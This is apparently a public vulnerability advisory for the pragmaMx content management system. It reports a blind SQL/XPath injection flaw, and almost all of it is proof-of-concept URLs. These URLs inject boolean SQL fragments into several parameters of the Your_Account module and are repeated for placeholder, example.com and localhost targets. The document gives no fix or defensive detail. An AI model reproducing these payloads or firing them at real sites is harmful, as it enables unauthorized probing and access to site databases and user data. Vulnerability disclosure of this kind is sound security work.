########################################### #
# CMS Name : pragmaMx ( All Version ) # # Bug Type : Blind SQL/XPath Injection vulnerability # # Found by : Hadi Kiamarsi # # Contact : hadikiamarsi [at] hotmail.com # # Download : http://sourceforge.net/projects/pragmamx/files/pragmaMx%20%20%28full%29/pragmaMx%200.1.11/pragmaMx_0.1.11.0.tar.gz/download # ########################################### PoC : http://[target]/[path]/modules.php?name=Your_Account&rop=showcontent"+and+31337-31337=0+--+&[email protected] http://[target]/[path]/modules.php?name=Your_Account&min=0&orderby=dateD"+and+31337-31337=0+--+&cid=0&jumpswitch=Switch http://[target]/[path]/modules.php?name=Your_Account&op=pass_lost&[email protected]&min=0'+and+31337-31337='0&orderby=dateD http://[target]/[path]/modules.php?name=Your_Account&rop=showcontent&[email protected]"+and+31337-31337="0 example : http://www.example.com/modules.php?name=Your_Account&rop=showcontent"+and+31337-31337=0+--+&[email protected] http://www.example.com/modules.php?name=Your_Account&min=0&orderby=dateD"+and+31337-31337=0+--+&cid=0&jumpswitch=Switch http://www.example.com/modules.php?name=Your_Account&op=pass_lost&[email protected]&min=0'+and+31337-31337='0&orderby=dateD http://www.example.com/modules.php?name=Your_Account&rop=showcontent&[email protected]"+and+31337-31337="0 local Example : http://localhost/html/modules.php?name=Your_Account&rop=showcontent"+and+31337-31337=0+--+&[email protected] http://localhost/html/modules.php?name=Your_Account&min=0&orderby=dateD"+and+31337-31337=0+--+&cid=0&jumpswitch=Switch http://localhost/html/modules.php?name=Your_Account&op=pass_lost&[email protected]&min=0'+and+31337-31337='0&orderby=dateD http://localhost/html/modules.php?name=Your_Account&rop=showcontent&[email protected]"+and+31337-31337="0
